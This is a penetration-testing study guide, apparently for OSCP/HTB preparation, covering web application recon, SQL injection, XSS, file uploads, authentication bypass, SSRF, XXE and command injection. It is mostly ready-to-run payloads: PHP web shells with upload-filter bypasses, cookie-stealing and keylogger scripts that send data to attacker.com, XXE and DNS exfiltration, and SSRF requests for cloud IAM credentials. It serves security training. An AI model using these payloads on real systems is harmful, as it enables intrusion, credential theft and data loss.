Home → NOTES → Penetration Testing - Web Application Testing Guide

Penetration Testing - Web Application Testing Guide

Category: Penetration Testing - Phase 2
Tags: oscp, htb, web-application, sql-injection, xss, burpsuite, owasp, file-upload

Web Application Testing Methodology

What this phase covers: Systematic testing of web applications for vulnerabilities including injection flaws, broken authentication, security misconfigurations, and business logic errors following OWASP methodology.

Why web application testing is critical: 90% of modern applications are web-based. Web vulnerabilities are the most common attack vector in penetration tests. OWASP Top 10 vulnerabilities appear in 80% of web applications tested.

HTB/OSCP Web Testing Approach: Manual testing combined with automated tools. Focus on input validation, authentication bypasses, file uploads, and privilege escalation through web interfaces.

Web Application Reconnaissance

HTTP Service Discovery and Analysis

What this involves: Understanding web application architecture, technology stack, functionality, and attack surface before testing specific vulnerabilities.

Why application mapping is essential: You can't attack what you don't understand. Proper mapping reveals hidden functionality, admin interfaces, API endpoints, and technology-specific attack vectors.

# Technology stack identification
whatweb http://target.com                    # Identify web technologies, frameworks, versions
whatweb -v http://target.com                 # Verbose output with detailed analysis
whatweb --color=never http://target.com      # Plain text output for scripting

# Why whatweb is important:
# - Identifies CMS versions (WordPress, Drupal, Joomla)
# - Reveals web frameworks (PHP, ASP.NET, Node.js)
# - Shows web server versions and modules
# - Helps select appropriate attack techniques

# HTTP headers analysis
curl -I http://target.com                    # Get HTTP headers only
curl -v http://target.com                    # Verbose output with request/response headers
curl -X OPTIONS http://target.com            # Check allowed HTTP methods

# Why header analysis matters:
# - Server information reveals versions and technologies
# - Security headers indicate security posture
# - Allowed methods may include dangerous ones (PUT, DELETE)
# - Custom headers may reveal internal information

# Advanced header analysis
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com  # Test for header-based bypasses
curl -H "X-Real-IP: 127.0.0.1" http://target.com        # Alternative IP header bypass
curl -H "Host: localhost" http://target.com              # Host header injection test

# Robots.txt and sitemap analysis
curl http://target.com/robots.txt            # Discover disallowed directories
curl http://target.com/sitemap.xml           # Discover site structure
curl http://target.com/sitemap_index.xml     # Alternative sitemap format

# Why these files are valuable:
# - robots.txt reveals directories admins want hidden
# - Sitemaps show complete site structure
# - May reveal admin panels, backup directories, API endpoints

Directory and File Discovery

gobuster - Advanced Web Content Discovery

Deep dive into gobuster capabilities beyond basic directory scanning:

# Comprehensive directory enumeration with multiple extensions
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,xml,bak,old,zip,tar,gz,sql,log,conf,config,ini,inc

# Why multiple extensions are crucial:
# - .php/.asp/.jsp: Server-side scripts with potential vulnerabilities
# - .bak/.old: Backup files often contain source code or credentials
# - .xml/.conf/.ini: Configuration files with sensitive information
# - .sql: Database dumps with credentials and data
# - .log: Log files with internal information
# - .inc: Include files that may be directly accessible

# Status code analysis and filtering
gobuster dir -u http://target.com -w wordlist.txt -s 200,204,301,302,307,401,403 -b 404,400,500
# Include: 200 (OK), 204 (No Content), 3xx (Redirects), 401 (Unauthorized), 403 (Forbidden)
# Exclude: 404 (Not Found), 400 (Bad Request), 500 (Server Error)

# Why status code filtering is important:
# - 401/403 indicate protected resources that might be bypassable
# - Redirects often point to login pages or restricted areas
# - 200 with small response sizes might be default pages
# - 204 responses might indicate API endpoints

# Authentication and session handling
gobuster dir -u http://target.com -w wordlist.txt -c "PHPSESSID=abc123; auth_token=xyz789"
gobuster dir -u http://target.com -w wordlist.txt -H "Authorization: Basic dXNlcjpwYXNz"
gobuster dir -u http://target.com -w wordlist.txt -H "X-API-Key: secret123"

# Custom User-Agent and headers for evasion
gobuster dir -u http://target.com -w wordlist.txt -a "Mozilla/5.0 GoogleBot/1.0"
gobuster dir -u http://target.com -w wordlist.txt -H "X-Forwarded-For: 127.0.0.1"

# API endpoint discovery
gobuster dir -u http://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt -x json,xml

# Why API discovery is critical:
# - APIs often have different authentication mechanisms
# - May expose sensitive data or functionality
# - Often less protected than main web interface
# - Can provide direct database access

# Virtual host and subdomain discovery
gobuster vhost -u target.com -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt --append-domain
gobuster vhost -u target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

# Advanced filtering and output analysis
gobuster dir -u http://target.com -w wordlist.txt -l -k -t 50 --wildcard
# -l: Show response length (helps identify interesting responses)
# -k: Skip SSL verification
# -t 50: 50 concurrent threads
# --wildcard: Continue even if wildcard responses detected

# Pattern-based discovery
gobuster dir -u http://target.com -w wordlist.txt -p pattern.txt
# pattern.txt contains: {GOBUSTER}/v1, {GOBUSTER}/v2, {GOBUSTER}/api
# Discovers versioned APIs and structured endpoints

ffuf - Advanced Web Fuzzing Techniques

ffuf provides more flexibility than gobuster for complex fuzzing scenarios:

# Multi-position fuzzing for complex scenarios
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZDIR -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZFILE -u http://target.com/FUZZDIR/FUZZFILE.php
# Fuzzes both directory and filename simultaneously
# Discovers nested structures and file relationships

# Parameter fuzzing for hidden functionality
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://target.com/search.php?FUZZ=test -fs 1234
# Discovers hidden GET parameters
# -fs filters out responses of specific size (error pages)

# POST parameter discovery
ffuf -w params.txt -X POST -d "FUZZ=test&known_param=value" -u http://target.com/login.php -H "Content-Type: application/x-www-form-urlencoded"
# Tests for additional POST parameters
# May discover debug parameters or hidden functionality

# JSON parameter fuzzing
ffuf -w params.txt -X POST -d '{"FUZZ":"test","known":"value"}' -u http://target.com/api/login -H "Content-Type: application/json"
# Fuzzes JSON API parameters
# Modern applications often use JSON APIs

# Header fuzzing for access control bypasses
ffuf -w /usr/share/seclists/Fuzzing/http-request-headers.txt -H "FUZZ: test" -u http://target.com/admin -fc 403,404
# Tests various HTTP headers for access control bypasses
# May discover X-Forwarded-For, X-Real-IP, X-Originating-IP bypasses

# Advanced filtering and matching
ffuf -w wordlist.txt -u http://target.com/FUZZ -mc 200,301,302,401,403 -ms 100-10000 -ml 10-1000
# -mc: Match HTTP status codes
# -ms: Match response size range
# -ml: Match response line count range

# Recursive fuzzing
ffuf -w wordlist.txt -u http://target.com/FUZZ -recursion -recursion-depth 2 -e .php,.html,.txt
# Automatically fuzzes discovered directories
# Limited recursion depth to prevent infinite loops

# Rate limiting and timing
ffuf -w wordlist.txt -u http://target.com/FUZZ -rate 100 -delay 1s
# Limits request rate to avoid detection
# Adds delay between requests

# Custom wordlist generation on-the-fly
seq -w 0000 9999 | ffuf -w - -u http://target.com/file_FUZZ.txt
# Generates numeric sequences for ID-based fuzzing
# Useful for document IDs, user IDs, etc.

SQL Injection Testing

sqlmap - Automated SQL Injection Detection and Exploitation

What sqlmap does: Comprehensive SQL injection testing tool that detects, exploits, and extracts data from SQL injection vulnerabilities across multiple database platforms.

Why sqlmap is essential: SQL injection is still one of the most critical web vulnerabilities. sqlmap automates complex injection techniques that would take hours to perform manually.

When to use sqlmap: After discovering web forms, URL parameters, or API endpoints that interact with databases. Essential for database extraction in HTB/OSCP scenarios.

# Basic SQL injection testing
sqlmap -u "http://target.com/page.php?id=1"
# Tests single GET parameter for SQL injection
# Automatic detection of injection types and database

# POST request testing
sqlmap -u "http://target.com/login.php" --data="username=admin&password=test"
# Tests POST parameters for SQL injection
# Common in login forms and search functionality

# Cookie-based injection testing
sqlmap -u "http://target.com/profile.php" --cookie="session_id=abc123; user_id=1"
# Tests cookie values for SQL injection
# Often overlooked attack vector

# HTTP header injection testing
sqlmap -u "http://target.com/" --headers="X-Forwarded-For: 1" --level=3
# Tests HTTP headers for injection
# Requires higher level for header testing

# Advanced detection techniques
sqlmap -u "http://target.com/search.php?q=test" --level=5 --risk=3
# Maximum detection level and risk
# Tests more injection points and techniques
# Higher risk of causing application disruption

# Database enumeration after successful injection
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Lists all databases available
# First step in data extraction

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
# Lists tables in specific database
# Identifies data structure

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --columns
# Lists columns in specific table
# Understands table structure before extraction

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump
# Extracts specific columns from table
# Focused data extraction

# Advanced exploitation techniques
sqlmap -u "http://target.com/page.php?id=1" --os-shell
# Attempts to get operating system shell
# Uses database functions to execute system commands

sqlmap -u "http://target.com/page.php?id=1" --sql-shell
# Interactive SQL shell
# Execute arbitrary SQL commands

sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
# Read files from the server filesystem
# Common target files: /etc/passwd, config files

sqlmap -u "http://target.com/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
# Write files to server filesystem
# Upload web shells for persistent access

# Authentication and session handling
sqlmap -u "http://target.com/page.php?id=1" --auth-type=basic --auth-cred="user:pass"
# HTTP Basic authentication
# Maintains authentication during testing

sqlmap -u "http://target.com/page.php?id=1" --cookie="session=abc123"
# Session cookie handling
# Maintains session state during testing

# Proxy and traffic routing
sqlmap -u "http://target.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
# Route traffic through proxy (Burp Suite)
# Allows manual analysis of requests

# Custom injection testing
sqlmap -u "http://target.com/page.php?id=1" --tamper="space2comment,randomcase"
# Use tamper scripts for WAF evasion
# space2comment: Replace spaces with comments
# randomcase: Randomize keyword case

# Time-based blind injection optimization
sqlmap -u "http://target.com/page.php?id=1" --technique=T --time-sec=2
# Focus on time-based techniques
# Adjust timing for network conditions

# Batch processing and automation
sqlmap -u "http://target.com/page.php?id=1" --batch --answers="crack=N,dict=N"
# Non-interactive mode for automation
# Predefined answers to common questions

Manual SQL Injection Testing

Why manual testing is important: Automated tools may miss context-specific injections, custom applications, or complex scenarios. Manual testing provides deeper understanding and coverage.

# Basic manual injection testing with curl
curl "http://target.com/page.php?id=1'"
# Test for error-based injection
# Look for database error messages

curl "http://target.com/page.php?id=1 AND 1=1"
curl "http://target.com/page.php?id=1 AND 1=2"
# Boolean-based blind injection testing
# Compare responses for true/false conditions

# Time-based blind injection testing
curl "http://target.com/page.php?id=1; WAITFOR DELAY '00:00:05'--"  # SQL Server
curl "http://target.com/page.php?id=1 AND SLEEP(5)--"              # MySQL
curl "http://target.com/page.php?id=1 AND pg_sleep(5)--"           # PostgreSQL

# Union-based injection testing
curl "http://target.com/page.php?id=1 UNION SELECT NULL,NULL,NULL--"
# Determine number of columns
# Match column count for successful union

curl "http://target.com/page.php?id=1 UNION SELECT 1,database(),version()--"
# Extract database information
# Common information gathering queries

# POST-based manual injection
curl -X POST -d "username=admin' OR 1=1--&password=test" http://target.com/login.php
# Login bypass attempt
# Common authentication bypass technique

# JSON injection testing
curl -X POST -H "Content-Type: application/json" -d '{"id":"1\" OR \"1\"=\"1"}' http://target.com/api/user
# JSON-based SQL injection
# Modern applications often use JSON APIs

Cross-Site Scripting (XSS) Testing

XSS Detection and Exploitation

What XSS vulnerabilities are: Input validation flaws that allow injection of malicious JavaScript into web pages viewed by other users.

Why XSS is critical: Leads to session hijacking, credential theft, defacement, and can be chained with other vulnerabilities for full compromise.

HTB/OSCP XSS scenarios: Often used for initial foothold, stealing admin cookies, or bypassing authentication mechanisms.

# Basic XSS testing payloads
curl "http://target.com/search.php?q=<script>alert('XSS')</script>"
# Basic reflected XSS test
# Look for script execution in response

curl "http://target.com/search.php?q=<img src=x onerror=alert('XSS')>"
# Alternative XSS payload using img tag
# Bypasses basic script tag filtering

# Advanced XSS payloads for filter evasion
curl "http://target.com/search.php?q=<svg onload=alert('XSS')>"
# SVG-based XSS payload
# Often bypasses blacklist filters

curl "http://target.com/search.php?q=javascript:alert('XSS')"
# JavaScript protocol handler
# Works in href attributes and form actions

# POST-based XSS testing
curl -X POST -d "comment=<script>alert('XSS')</script>" http://target.com/comment.php
# Stored XSS in form submissions
# Persists and affects multiple users

# Cookie stealing XSS payload
curl "http://target.com/search.php?q=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>"
# Steals session cookies
# Allows session hijacking

# DOM-based XSS testing
curl "http://target.com/page.php#<script>alert('XSS')</script>"
# Fragment-based XSS
# Executed by client-side JavaScript

# XSS in HTTP headers
curl -H "User-Agent: <script>alert('XSS')</script>" http://target.com/
curl -H "Referer: <script>alert('XSS')</script>" http://target.com/
# Header-based XSS
# Displayed in logs or admin panels

XSS Payload Generation and Customization

# Generate custom XSS payloads for specific scenarios
echo "document.location='http://$(hostname -I | awk '{print $1}'):8080/steal.php?cookie='+document.cookie" | base64
# Base64 encoded cookie stealing payload
# Evades basic detection

# BeEF integration payload
echo "<script src='http://$(hostname -I | awk '{print $1}'):3000/hook.js'></script>"
# Browser Exploitation Framework integration
# Provides persistent browser control

# Keylogger XSS payload
cat > keylogger.js << 'EOF'
document.addEventListener('keydown', function(e) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://attacker.com/log.php', true);
    xhr.send('key=' + e.key);
});
EOF
# JavaScript keylogger
# Captures user keystrokes

File Upload Vulnerabilities

File Upload Testing Methodology

What file upload vulnerabilities are: Flaws in file upload functionality that allow uploading malicious files, leading to code execution, directory traversal, or denial of service.

Why file uploads are critical: Direct path to remote code execution. Common in HTB/OSCP scenarios for initial compromise.

# Basic file upload testing
# Create test files with different extensions
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
echo "<?php system(\$_GET['cmd']); ?>" > shell.php5
echo "<?php system(\$_GET['cmd']); ?>" > shell.phtml
echo "<?php system(\$_GET['cmd']); ?>" > shell.inc

# Test various file extensions
curl -X POST -F "file=@shell.php" http://target.com/upload.php
curl -X POST -F "file=@shell.php5" http://target.com/upload.php
curl -X POST -F "file=@shell.phtml" http://target.com/upload.php

# MIME type bypass testing
curl -X POST -F "file=@shell.php;type=image/jpeg" http://target.com/upload.php
# Spoofs MIME type to bypass client-side filtering
# Many applications only check MIME type

# File signature bypass (magic bytes)
printf "\xFF\xD8\xFF\xE0<?php system(\$_GET['cmd']); ?>" > shell_with_jpeg_header.php
curl -X POST -F "file=@shell_with_jpeg_header.php" http://target.com/upload.php
# Adds JPEG magic bytes to PHP shell
# Bypasses file signature validation

# Double extension bypass
echo "<?php system(\$_GET['cmd']); ?>" > shell.php.jpg
curl -X POST -F "file=@shell.php.jpg" http://target.com/upload.php
# Some applications strip last extension
# Results in shell.php being executed

# Null byte injection (older PHP versions)
echo "<?php system(\$_GET['cmd']); ?>" > "shell.php%00.jpg"
curl -X POST -F "file=@shell.php%00.jpg" http://target.com/upload.php
# Null byte truncates filename parsing
# Works on vulnerable PHP versions

# Path traversal in filename
curl -X POST -F "file=@shell.php" -F "filename=../../../var/www/html/shell.php" http://target.com/upload.php
# Attempts to write file outside intended directory
# May allow writing to web root

# Large file upload (DoS testing)
dd if=/dev/zero of=large_file.txt bs=1M count=1000
curl -X POST -F "file=@large_file.txt" http://target.com/upload.php
# Tests for file size limitations
# May cause denial of service

# Polyglot file creation (valid image + PHP code)
exiftool -Comment="<?php system(\$_GET['cmd']); ?>" image.jpg -o polyglot.jpg
# Embeds PHP code in image metadata
# Executes if processed by PHP

Advanced File Upload Bypass Techniques

# .htaccess upload for Apache servers
cat > .htaccess << 'EOF'
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
EOF
curl -X POST -F "file=@.htaccess" http://target.com/upload.php
# Makes Apache treat images as PHP files
# Allows execution of image-based shells

# Web.config upload for IIS servers
cat > web.config << 'EOF'
<configuration>
    <system.webServer>
        <handlers>
            <add name="php-jpg" path="*.jpg" verb="*" modules="FastCgiModule" scriptProcessor="C:\php\php-cgi.exe" resourceType="Unspecified" />
        </handlers>
    </system.webServer>
</configuration>
EOF
curl -X POST -F "file=@web.config" http://target.com/upload.php
# IIS equivalent of .htaccess
# Configures server to execute images as PHP

# ZIP file upload with path traversal
zip malicious.zip ../../../var/www/html/shell.php
curl -X POST -F "file=@malicious.zip" http://target.com/upload.php
# Path traversal via ZIP extraction
# May extract files to arbitrary locations

# XML External Entity (XXE) via file upload
cat > malicious.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
EOF
curl -X POST -F "file=@malicious.xml" http://target.com/upload.php
# XXE attack via XML file upload
# May reveal server files

Authentication and Session Management Testing

Authentication Bypass Techniques

What authentication flaws involve: Weaknesses in login mechanisms, session management, password policies, and access controls.

Why authentication testing is crucial: Authentication bypasses provide direct access to protected functionality. Common in web applications with custom authentication.

# SQL injection authentication bypass
curl -X POST -d "username=admin' OR '1'='1'--&password=anything" http://target.com/login.php
# Classic SQL injection login bypass
# Bypasses password verification

# NoSQL injection authentication bypass
curl -X POST -H "Content-Type: application/json" -d '{"username":{"$ne":""},"password":{"$ne":""}}' http://target.com/api/login
# NoSQL (MongoDB) injection bypass
# Modern applications using NoSQL databases

# LDAP injection authentication bypass  
curl -X POST -d "username=admin)(&(password=*&password=anything" http://target.com/login.php
# LDAP injection in Active Directory environments
# Bypasses LDAP authentication

# HTTP parameter pollution
curl -X POST -d "username=guest&username=admin&password=test" http://target.com/login.php
# Different parameters with same name
# May cause authentication bypass

# Session fixation testing
curl -c cookies.txt -b cookies.txt http://target.com/login.php
# Captures session ID before authentication
# Tests if session ID changes after login

# Weak session token analysis
for i in {1..10}; do
    curl -c "cookies_$i.txt" http://target.com/login.php
    grep -o 'PHPSESSID=[^;]*' "cookies_$i.txt"
done
# Analyzes multiple session tokens
# Looks for predictable patterns

# Password reset token analysis
curl -X POST -d "email=admin@target.com" http://target.com/reset_password.php
# Requests password reset
# Analyze reset tokens for predictability

# Multi-factor authentication bypass
curl -X POST -d "username=admin&password=correct&otp=" http://target.com/login.php
# Empty OTP field testing
# May bypass MFA validation

# Race condition in authentication
for i in {1..50}; do
    curl -X POST -d "username=admin&password=wrong" http://target.com/login.php &
done
wait
# Concurrent login attempts
# May bypass rate limiting

Session Management Testing

# Session timeout testing
curl -b "session=valid_session_id" http://target.com/profile.php
sleep 3600  # Wait 1 hour
curl -b "session=valid_session_id" http://target.com/profile.php
# Tests session timeout implementation
# Long-lived sessions are security risks

# Session token entropy analysis
python3 -c "
import requests
import re
tokens = []
for i in range(100):
    r = requests.get('http://target.com/login.php')
    token = re.search(r'PHPSESSID=([^;]+)', r.headers.get('Set-Cookie', ''))
    if token:
        tokens.append(token.group(1))
print(f'Unique tokens: {len(set(tokens))}/{len(tokens)}')
"
# Analyzes session token uniqueness
# Predictable tokens allow session hijacking

# Cross-site request forgery (CSRF) testing
curl -X POST -d "email=attacker@evil.com" -H "Referer: http://evil.com" http://target.com/change_email.php
# Tests CSRF protection
# Missing CSRF tokens allow cross-site attacks

# Session hijacking via XSS
curl "http://target.com/search.php?q=<script>new Image().src='http://attacker.com/cookie.php?c='+document.cookie</script>"
# Combines XSS with session hijacking
# Steals session cookies via JavaScript

Business Logic Vulnerabilities

Application-Specific Logic Flaws

What business logic flaws are: Vulnerabilities in application-specific functionality that don't fit traditional vulnerability categories but allow unauthorized actions.

Why business logic testing is important: These flaws are often missed by automated scanners but can provide significant access to application functionality.

# Price manipulation testing (e-commerce)
curl -X POST -d "item_id=123&price=-10.00&quantity=1" http://target.com/purchase.php
# Negative price testing
# May result in credit to attacker's account

curl -X POST -d "item_id=123&price=0.01&quantity=1" http://target.com/purchase.php
# Price modification testing
# Tests if client-side prices are trusted

# Quantity manipulation
curl -X POST -d "item_id=123&quantity=-5" http://target.com/cart.php
# Negative quantity testing
# May cause unexpected behavior

# User enumeration via response timing
time curl -X POST -d "username=existing_user&password=wrong" http://target.com/login.php
time curl -X POST -d "username=nonexistent_user&password=wrong" http://target.com/login.php
# Compares response times
# Different timing may indicate user existence

# Privilege escalation via parameter manipulation
curl -b "session=user_session" http://target.com/profile.php?user_id=1
curl -b "session=user_session" http://target.com/profile.php?user_id=2
# Tests horizontal privilege escalation
# Access to other users' data

curl -b "session=user_session" -X POST -d "role=admin" http://target.com/update_profile.php
# Tests vertical privilege escalation
# Attempts to elevate privileges

# Workflow bypass testing
curl -X POST -d "step=3" http://target.com/checkout.php
# Skips intermediate steps
# May bypass validation or payment

# Rate limiting bypass
curl -H "X-Forwarded-For: 192.168.1.1" -X POST -d "username=admin&password=wrong" http://target.com/login.php
curl -H "X-Forwarded-For: 192.168.1.2" -X POST -d "username=admin&password=wrong" http://target.com/login.php
# IP spoofing to bypass rate limits
# Uses different source IPs

Burp Suite Integration and Manual Testing

Burp Suite Professional Features for HTB/OSCP

What Burp Suite provides: Comprehensive web application security testing platform with proxy, scanner, intruder, and various specialized tools.

Why Burp Suite is essential: Industry standard for manual web application testing. Provides detailed control over HTTP requests and automated testing capabilities.

# Setting up Burp Suite proxy
export http_proxy=http://127.0.0.1:8080
export https_proxy=http://127.0.0.1:8080

# Configure applications to use Burp proxy
curl --proxy http://127.0.0.1:8080 http://target.com
firefox --profile /path/to/profile &  # With proxy configured

# Burp Intruder attack types and use cases:
# 1. Sniper: Single payload position
#    - Parameter fuzzing, directory brute force
# 2. Battering Ram: Same payload in all positions
#    - Username = password attacks
# 3. Pitchfork: Different payload for each position
#    - Username:password pair testing
# 4. Cluster Bomb: All combinations of payloads
#    - Comprehensive parameter testing

# Burp Collaborator for out-of-band testing
# Use Burp Collaborator URLs in payloads to detect:
# - Blind SQL injection with DNS queries
# - XXE vulnerabilities with HTTP callbacks
# - SSRF vulnerabilities with external requests

# Custom Burp extensions for HTB/OSCP:
# - Param Miner: Discovers hidden parameters
# - AuthMatrix: Tests authorization flaws
# - Upload Scanner: Tests file upload vulnerabilities
# - J2EEScan: Java application vulnerabilities

Manual Testing Methodology with Burp Suite

# Step 1: Spider and map application
# Use Burp Spider to crawl application
# Identify all endpoints, parameters, and functionality

# Step 2: Analyze traffic patterns
# Review HTTP history for:
# - Authentication mechanisms
# - Session management
# - Input validation
# - Error handling

# Step 3: Test individual components
# Use Burp Repeater for:
# - SQL injection testing
# - XSS payload testing
# - Authentication bypass
# - Parameter manipulation

# Step 4: Automated fuzzing
# Use Burp Intruder for:
# - Parameter value fuzzing
# - Directory enumeration
# - Authentication brute forcing
# - Session token analysis

# Step 5: Extension integration
# Leverage Burp extensions for specialized testing:
# - Param Miner for hidden parameter discovery
# - AuthMatrix for authorization testing
# - Upload Scanner for file upload vulnerabilities

Server-Side Request Forgery (SSRF) Testing

SSRF Detection and Exploitation

What SSRF vulnerabilities are: Flaws that allow attackers to make requests from the server to internal or external systems, bypassing network segmentation and access controls.

Why SSRF is critical in HTB/OSCP: Often leads to internal network access, cloud metadata access (AWS, Azure), and can be chained with other vulnerabilities for significant impact.

# Basic SSRF testing
curl -X POST -d "url=http://127.0.0.1:80" http://target.com/fetch.php
curl -X POST -d "url=http://localhost:22" http://target.com/fetch.php
curl -X POST -d "url=http://10.0.0.1:3389" http://target.com/fetch.php
# Tests for internal network access
# Common internal services: SSH (22), RDP (3389), databases

# Cloud metadata access (AWS)
curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" http://target.com/fetch.php
curl -X POST -d "url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" http://target.com/fetch.php
# AWS metadata service access
# May reveal IAM credentials and instance information

# Azure metadata access
curl -X POST -d "url=http://169.254.169.254/metadata/instance?api-version=2021-02-01" -H "Metadata: true" http://target.com/fetch.php
# Azure metadata service
# Requires Metadata header

# Google Cloud metadata access  
curl -X POST -d "url=http://metadata.google.internal/computeMetadata/v1/instance/" -H "Metadata-Flavor: Google" http://target.com/fetch.php
# Google Cloud metadata
# Different endpoint and header requirement

# Protocol smuggling for SSRF bypass
curl -X POST -d "url=gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a" http://target.com/fetch.php
# Gopher protocol to interact with Redis
# Can execute Redis commands via SSRF

curl -X POST -d "url=dict://127.0.0.1:6379/info" http://target.com/fetch.php
# Dict protocol for service probing
# Useful for port scanning via SSRF

# File protocol access (if supported)
curl -X POST -d "url=file:///etc/passwd" http://target.com/fetch.php
curl -X POST -d "url=file:///c:/windows/system32/drivers/etc/hosts" http://target.com/fetch.php
# Local file access via SSRF
# May reveal sensitive system files

# SSRF bypass techniques
curl -X POST -d "url=http://127.1:80" http://target.com/fetch.php          # Alternative localhost representation
curl -X POST -d "url=http://0:80" http://target.com/fetch.php              # Short form localhost
curl -X POST -d "url=http://[::1]:80" http://target.com/fetch.php          # IPv6 localhost
curl -X POST -d "url=http://2130706433:80" http://target.com/fetch.php     # Decimal representation of 127.0.0.1

# DNS rebinding bypass
curl -X POST -d "url=http://malicious.com" http://target.com/fetch.php
# malicious.com resolves to 127.0.0.1 after DNS TTL expires
# Bypasses blacklist-based SSRF protection

# URL encoding bypass
curl -X POST -d "url=http://%31%32%37%2e%30%2e%30%2e%31:80" http://target.com/fetch.php
# URL encoded 127.0.0.1
# May bypass simple string matching filters

XML External Entity (XXE) Injection

XXE Detection and Exploitation

What XXE vulnerabilities are: XML parsing flaws that allow attackers to access local files, perform SSRF attacks, or cause denial of service through malicious XML input.

Why XXE is important: Common in applications processing XML, SOAP services, and file uploads. Can lead to file disclosure and internal network access.

# Basic XXE testing
cat > xxe_basic.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
EOF
curl -X POST -H "Content-Type: application/xml" --data-binary @xxe_basic.xml http://target.com/api/process

# File disclosure via XXE
cat > xxe_file_read.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>
<user>
    <username>&xxe;</username>
    <password>test</password>
</user>
EOF
curl -X POST -H "Content-Type: application/xml" --data-binary @xxe_file_read.xml http://target.com/user/create

# XXE with parameter entities (blind XXE)
cat > xxe_blind.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/dtd.xml?%xxe;'>">
%param1;
]>
<root>&exfil;</root>
EOF

# External DTD for blind XXE
cat > dtd.xml << 'EOF'
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/steal.php?x=%file;'>">
%eval;
%exfil;
EOF
# Host dtd.xml on attacker server
# Exfiltrates file contents via HTTP request

# XXE via SOAP services
cat > xxe_soap.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <getUserInfo>
            <username>&xxe;</username>
        </getUserInfo>
    </soap:Body>
</soap:Envelope>
EOF
curl -X POST -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: getUserInfo" --data-binary @xxe_soap.xml http://target.com/soap/service

# XXE via file upload
cat > xxe_upload.svg << 'EOF'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
    <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
EOF
curl -X POST -F "file=@xxe_upload.svg" http://target.com/upload

# XXE denial of service (billion laughs attack)
cat > xxe_dos.xml << 'EOF'
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>
EOF
# Exponential entity expansion
# Can cause memory exhaustion and DoS

Command Injection Testing

OS Command Injection Detection and Exploitation

What command injection is: Vulnerabilities that allow execution of arbitrary operating system commands through web application input fields.

Why command injection is critical: Direct path to remote code execution and system compromise. Common in web applications that interact with system commands.

# Basic command injection testing
curl -X POST -d "ip=127.0.0.1; whoami" http://target.com/ping.php
curl -X POST -d "ip=127.0.0.1 && whoami" http://target.com/ping.php
curl -X POST -d "ip=127.0.0.1 | whoami" http://target.com/ping.php
curl -X POST -d "ip=127.0.0.1 || whoami" http://target.com/ping.php
# Different command separators
# Tests for command chaining

# Command injection with output redirection
curl -X POST -d "ip=127.0.0.1; whoami > /tmp/output.txt" http://target.com/ping.php
# Redirects output to file
# Useful when direct output isn't displayed

# Blind command injection with time delays
curl -X POST -d "ip=127.0.0.1; sleep 10" http://target.com/ping.php
# Time-based detection
# Measures response time for confirmation

# Blind command injection with DNS queries
curl -X POST -d "ip=127.0.0.1; nslookup \$(whoami).attacker.com" http://target.com/ping.php
# Exfiltrates command output via DNS
# Useful for blind command injection

# Command injection with special characters
curl -X POST -d "ip=127.0.0.1\`whoami\`" http://target.com/ping.php        # Backticks
curl -X POST -d "ip=127.0.0.1\$(whoami)" http://target.com/ping.php         # Command substitution
curl -X POST -d "ip=127.0.0.1%26%26whoami" http://target.com/ping.php       # URL encoded &&

# Filter bypass techniques
